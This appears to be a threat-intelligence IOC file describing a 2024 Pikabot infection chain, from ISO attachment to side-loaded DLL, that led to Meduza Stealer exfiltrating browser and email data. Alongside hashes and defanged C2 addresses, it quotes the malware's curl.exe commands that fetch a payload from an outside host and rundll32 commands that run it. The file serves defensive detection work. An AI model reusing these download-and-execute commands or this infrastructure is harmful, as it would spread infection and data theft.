2024-03-06-IOCs-for-Pikabot-and-Meduza-Stealer-activity.txt

2024-03-06 (WEDNESDAY): PIKABOT INFECTION LEADS TO MEDUZA STEALER

REFERENCES:

- https://www.linkedin.com/posts/unit42_pikabot-meduza-meduzastealer-activity-7171529296388321282-7yIh
- https://twitter.com/Unit42_Intel/status/1765763677192356196

INITIAL REFERENCES ON PIKABOT ACTIVITY:

- hxxps://twitter.com/Cryptolaemus1/status/1765409019718512946
- hxxps://bazaar.abuse.ch/sample/c2071407cf960fa166ac47d86f4a92b64873cd8c37a4ea416e80488c5f327c8f/

INFECTION CHAIN:

- Email --> attached ISO image --> copy of write.exe side-loads malicious DLL named edputil.dll -->
  side-loaded DLL retrieves and runs Pikabot DLL --> Pikabot C2 --> Meduza Stealer activity

NOTES:

- The infection chain uses DLL-side loading by a copy of the legitimate file for Windows Write (write.exe).
- 25 minutes after the initial Pikabot infection, the C2 server returned nearly 403 kB of data over HTTPS.
- This encrypted HTTPS traffic likely contained a malware binary for Meduza Stealer.
- Shortly after that, the infected host sent a large amount of data to a Meduza Stealer C2 server at 141.98.83.242 over TCP port 15666.
- This data exfiltrated to the Meduza C2 server was a TCP stream of base64 text.
- Converting the base64 text revealed data from email clients, web browsers, and system information from the infected host.
- hxxp://141.98.83[.]242/auth/login reveals a login panel for Meduza Stealer.

ASSOCIATED MALWARE:

SHA256 HASHES FROM FOUR EXAMPLES OF ISO IMAGES ATTACHED TO EMAILS DISTRIBUTING PIKABOT:

- cc5f2925491e4c13369067816029bb586221330f95a40b0c8a746bee0dd76c44 - CUMQUECL.iso
- c2071407cf960fa166ac47d86f4a92b64873cd8c37a4ea416e80488c5f327c8f - PERSPICIATISM.iso
- c2261343c19a193e92980764be4d4db3677fef9ec18ccd3fa4a3dbe45da46b05 - REPELLENDUSYU.iso
- 99c0867b3cfeafe1e2aa83f18b01b88107aff94b77a2c118abb215dbc5c00fb3 - SITXH.iso

LEGITIMATE OR NON-MALICIOUS FILES IN EACH OF THE ABOVE ISO IMAGES:

- [filename].iso\data\document.rtf  <-- not malicious
- [filename].iso\Open_Document.exe  <-- legitimate file, copy of Windows Write (write.exe)

3 UNIQUE DLL FILES FROM THE ABOVE ISO IMAGES SIDE-LOADED BY COPY OF WRITE.EXE

- 37cd467d8007b310a18c2c0675f5aacce24bb3d8c7213695033ba1ee8f59ffd3 - CUMQUECL.iso\edputil.dll
- 905a3a144f94a38ac6059759879caec19cff446b98c24bb2035b3293330e03b2 - PERSPICIATISM.iso\edputil.dll
- 905a3a144f94a38ac6059759879caec19cff446b98c24bb2035b3293330e03b2 - REPELLENDUSYU.iso\edputil.dll
- fc7c36172f3763c94e20a94886dbac42fd27a1cd91c3cf1f4808897932fc55fb - SITXH.iso\edputil.dll

EXAMPLES OF COMMANDS GENERATED BY THE EDPUTILDLL FILES TO RETRIEVE PIKABOT:

- cmd.exe /c curl.exe --output c:\wnd\6775.png --url hxxps://yourunitedlaws[.]com/mrD/2138
- cmd.exe /c curl.exe --output c:\wnd\3291.png --url hxxps://yourunitedlaws[.]com/mrD/4462
- cmd.exe /c curl.exe --output c:\wnd\2396.png --url hxxps://yourunitedlaws[.]com/mrD/7207
- cmd.exe /c curl.exe --output c:\wnd\1138.png --url hxxps://yourunitedlaws[.]com/mrD/8428

EXAMPLES OF COMMANDS GENERATED BY THE EDPUTIL.DLL FILES TO RUN PIKABOT:

- rundll32 c:\wnd\6775.png,GetModuleProp
- rundll32 c:\wnd\3291.png,GetModuleProp
- rundll32 c:\wnd\2396.png,GetModuleProp
- rundll32 c:\wnd\1138.png,GetModuleProp

SAME FILE HASH FOR HTE ABOVE PIKABOT DLL FILES:

- SHA256 hash: fb8e3ef19f0a3ad298b8d315a716aae1151332c1f097296962a3a04017f940ae
- File size: 860,160 bytes
- File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- File location: hxxps://yourunitedlaws[.]com/mrD/[4-digit number]
- File location: C:\Wnd\[4-digit number].png
- Run method: rundll32 [file],GetModuleProp

PIKABOT C2 TRAFFIC FROM AN INFECTED WINDOWS HOST:

- 94.72.104[.]77 port 13724 - HTTPS traffic

MEDUZA STEALER DATA EXFILTRATION:

- 141.98.83[.]242 port 15666 - TCP traffic containing base64 text

ADDITIONAL PIKABOT DATA IN @PR0XYLIFE'S GITHUB LINK FROM THE @CRYPTOLAEMUS1 TWEET:

URLS FOR PIKABOT DLL:

- hxxps://yourunitedlaws[.]com/mrD/[4-digit number]
- hxxps://topflowersclub[.]com/aUvM/[4-digit number]

PIKABOT C2 SERVERS:

- hxxps://45.77.63[.]237:5632/
- hxxps://70.34.199[.]64:9785/
- hxxps://70.34.223[.]164:5000/
- hxxps://84.46.240[.]42:2083/
- hxxps://94.72.104[.]77:13724/
- hxxps://94.72.104[.]80:5000/
- hxxps://154.12.236[.]248:13786/
- hxxps://154.53.55[.]165:13783/
- hxxps://158.247.240[.]58:5632/
- hxxps://198.38.94[.]213:2224/
- hxxps://209.126.86[.]48:1194/